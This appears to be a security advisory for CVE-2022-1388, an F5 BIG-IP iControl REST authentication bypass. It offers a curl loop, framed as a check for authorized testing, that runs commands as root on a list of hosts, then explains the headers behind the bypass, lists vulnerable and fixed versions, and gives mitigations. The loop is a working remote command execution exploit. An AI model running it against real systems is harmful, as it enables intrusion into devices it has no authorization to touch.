This vulnerability (CVE-2022-1388, an authentication bypass in the iControl REST interface) may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.

You can use the following curl one-liner to check for the F5 BIG-IP vulnerability, or use the provided Python script. Note that the check is not passive: it asks the iControl REST endpoint to run `id` as root, so only run it against systems you are authorized to test. A vulnerable host answers `200` with a JSON body whose `commandResult` contains the `uid=0(root) ...` output; a patched host answers `401`.
```bash
while read -r ip; do
  curl -sk -m 10 -u 'admin:' \
    -H 'Content-Type: application/json' \
    -H 'Connection: X-F5-Auth-Token, close' \
    -H 'X-F5-Auth-Token: 0' \
    "https://$ip/mgmt/tm/util/bash" \
    -d '{"command":"run","utilCmdArgs":"-c id"}'
  echo
done < ips.txt
```

The bypass needs all three headers together: the `Connection` header that names `X-F5-Auth-Token` makes the front-end httpd strip that token header before the request reaches the REST layer, which then accepts the Basic-auth username `admin` without checking the password (`-u 'admin:'` supplies an empty password so curl does not prompt interactively). `-k` is needed because the management interface uses a self-signed certificate, and `-m 10` keeps one unreachable host from stalling the loop.
Branch | Vulnerable Versions | Fixes Introduced |
---|---|---|
11.x | 11.6.1-11.6.5 | No Fix |
12.x | 12.1.0-12.1.6 | No Fix |
13.x | 13.1.0-13.1.4 | 13.1.5 |
14.x | 14.1.0-14.1.4 | 14.1.4.6 |
15.x | 15.1.0-15.1.5 | 15.1.5.1 |
16.x | 16.1.0-16.1.2 | 16.1.2.2 |
17.x | None | 17.0.0 |
- Upgrade to the fixed version in the `Fixes Introduced` column (preferred method). The 11.x and 12.x branches receive no fix, so systems on those branches must be upgraded to a supported branch.
- Block iControl REST access through the self IP address (port lockdown).
- Block iControl REST access through the management interface, allowing only trusted networks and hosts.
- Modify the BIG-IP httpd configuration.

The last three options only reduce exposure; they do not remove the vulnerability and should be treated as temporary measures until the upgrade is done. For more information about mitigation, check out the references.